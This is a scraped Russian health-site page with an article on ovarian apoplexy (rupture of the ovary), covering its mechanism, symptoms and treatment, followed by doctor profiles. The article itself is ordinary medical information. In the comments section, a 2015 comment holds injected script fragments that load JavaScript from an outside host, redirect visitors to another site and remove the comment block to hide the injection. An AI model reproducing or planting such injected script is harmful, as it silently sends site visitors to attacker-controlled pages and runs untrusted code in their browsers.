Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Апоплексия яичника  >>  Апоплексия яичника
 
Обратная связь
 

Апоплексия яичника

Размер шрифта
30 марта 2012 10:00
  • google_analytics: false
  • Нравится

Острая боль внизу живота у женщины – серьезный повод для беспокойства и осмотра хирургом и гинекологом. Тем более, если речь идет об апоплексии яичника, ведь разрыв внутреннего органа как стихийное бедствие. Чем страшен разрыв яичника и как его предупредить?

1 

Механизм заболевания

В группе риска по апоплексии яичника находится любая менструирующая женщина, т.е. женщина детородного возраста. Что такое апоплексия яичника. В тот момент, когда яйцеклетка созревает и выходит из яичника, происходит разрыв оболочки яичника с образованием небольшой кисты (не больше 20 мм), из которой выходит желтое тело, которое продуцирует гормоны. Этот процесс может нарушиться из-за воспалительных заболеваний, которые перенесла женщина, или по причине структурных изменений яичника и тогда тело яичника разрывается, что приводит к кровотечению и резкой острой боли. Если кровотечение длится долго, то женщина может умереть от внутренней кровопотери и перитонита.

Симптомы апоплексии яичника

  1. Боль внизу живота.

  2. Признаки кровопотери:

  • резкая слабость;
  • потливость;
  • головокружение;
  • потеря сознания.

Обычно состояние разрыва яичника может появиться в середине цикла, но также это может случиться в любой другой момент.

Острая резкая боль внизу живота у женщины – повод для обращения к врачу.

Лечение

При жалобах с подозрением на апоплексию яичника врач обследует женщину при помощи УЗИ-аппарата и назначит следующее лечение:

  • При разрыве яичника с кровотечением требуется срочное оперативное вмешательство посредством открытой лапаротомии или при помощи эндоскопа.
  • В том случае, если основным симптомом является боль при отсутствии кровотечения или при незначительной кровопотере, можно ограничиться медикаментозным лечением для устранения боли и постоянным наблюдением за состоянием женщины (УЗИ-обследования, измерение давления крови и анализы крови).
  • При острой боли, характерной для апоплексии яичника, вызывайте скорую помощь, потому что клинические симптомы этого коварного заболевания имеют способность нарастать со временем и требуют наблюдения медицинского работника.

Разрыв яичника у женщины подобен катастрофе. Правильное поведение при подозрении на это заболевание не только ускорит выздоровление, но и спасет жизнь.

 

Сюжеты по теме:
Даст жизнь или заберет. Апоплексия яичника.

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:46

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.